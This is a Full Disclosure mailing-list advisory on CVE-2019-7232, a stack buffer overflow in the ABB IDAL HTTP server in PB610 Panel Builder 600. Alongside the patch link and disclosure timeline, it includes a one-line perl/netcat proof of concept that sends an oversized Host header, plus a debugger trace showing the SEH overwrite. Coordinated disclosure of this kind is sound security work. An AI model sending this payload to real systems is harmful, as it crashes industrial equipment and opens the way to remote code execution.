[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability
From: xen1thLabs <xen1thLabs () darkmatter ! ae>
Date: 2019-06-20 12:13:49
Message-ID: 6e86abcb86744d939f91742bbae4d977 () darkmatter ! ae
[Download RAW message or body]
XL-19-011 - ABB IDAL HTTP Server Stack-Based Buffer Overflow Vulnerability
========================================================================
Identifiers
-----------
XL-19-011
CVE-2019-7232
ABBVU-IAMF-1902009
CVSS Score
----------
8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Affected vendor
---------------
ABB (new.abb.com)
Credit
------
Eldar Marcussen - xen1thLabs - Software Labs
Vulnerability summary
---------------------
The IDAL HTTP server is vulnerable to a stack-based buffer overflow when receiving a large host \
header in a HTTP request. The host header value overflows a buffer and overwrites the \
Structured Exception Handler (SEH) address with a larger buffer.
Technical details
-----------------
An unauthenticated attacker can send a Host header value of 2047 bytes or more to overflow the \
host headers and overwrite the SEH address which can then be leveraged to execute attacker \
controlled code on the server.
Proof of concept
----------------
```
perl -e 'print "GET / HTTP/1.1\r\nHost: " . "A" x 2047 . "\r\n\r\n";' | nc targetip 81
````
STATUS_STACK_BUFFER_OVERRUN encountered
(1734.510): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=1032cc34 ecx=762dd018 edx=05b8e4c9 esi=00000000 edi=05b8eec3
eip=762dce95 esp=05b8e710 ebp=05b8e78c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
kernel32!SetThreadExecutionState+0x134b0:
762dce95 cc int 3
0:032> !exchain
05b8e77c: kernel32!RegSaveKeyExW+3b9 (76309332)
Invalid exception stack at 41414141
Affected systems
----------------
PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 ... 2.8.0.367
Solution
--------
Apply the patches and instructions from vendor:
- ABB PB610 - https://search.abb.com/library/Download.aspx?DocumentID=3ADR010377&LanguageCode=en&DocumentPartId=&Action=Launch
Disclosure timeline
-------------------
04/02/2019 - Contacted ABB requesting disclosure coordination
05/02/2019 - Provided vulnerability details
05/06/2019 - Patch available
17/06/2019 - xen1thLabs public disclosure
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic